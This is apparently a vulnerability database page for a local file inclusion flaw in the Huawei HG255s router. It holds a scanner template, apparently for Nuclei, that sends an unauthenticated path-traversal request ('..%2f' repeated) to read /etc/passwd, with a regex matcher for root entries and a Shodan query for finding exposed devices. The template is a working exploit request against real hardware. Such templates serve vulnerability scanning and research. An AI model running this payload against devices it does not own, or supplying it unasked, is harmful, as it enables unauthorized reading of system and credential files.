huawei-hg255s-lfi: Huawei HG255s - Local File Inclusion

2025-08-01 Huawei HG255s PoC Public

Description

Huawei HG255s is vulnerable to local file inclusion due to insufficient validation of the received HTTP requests. A remote attacker may access the local files on the device without authentication.

PoC

id: huawei-hg255s-lfi

info:
  name: Huawei HG255s - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: Huawei HG255s is vulnerable to local file inclusion due to insufficient validation of the received HTTP requests. A remote attacker may access the local files on the device without authentication.
  reference:
    - https://cxsecurity.com/issue/WLB-2017090053
    - https://www.youtube.com/watch?v=n02toTFkLOU
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-23
    cpe: cpe:2.3:h:huawei:hg255s:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    shodan-query: http.html:"HG532e"
    product: hg255s
    vendor: huawei
  tags: huawei,lfi,router,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022015138aee9234088fc2e5f4d97fad17bdbd350a422543b688984563a775763a8f0221008df879931488637cbc8e9ec7c80762565de942638fa33c1346050126bb4c19a5:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities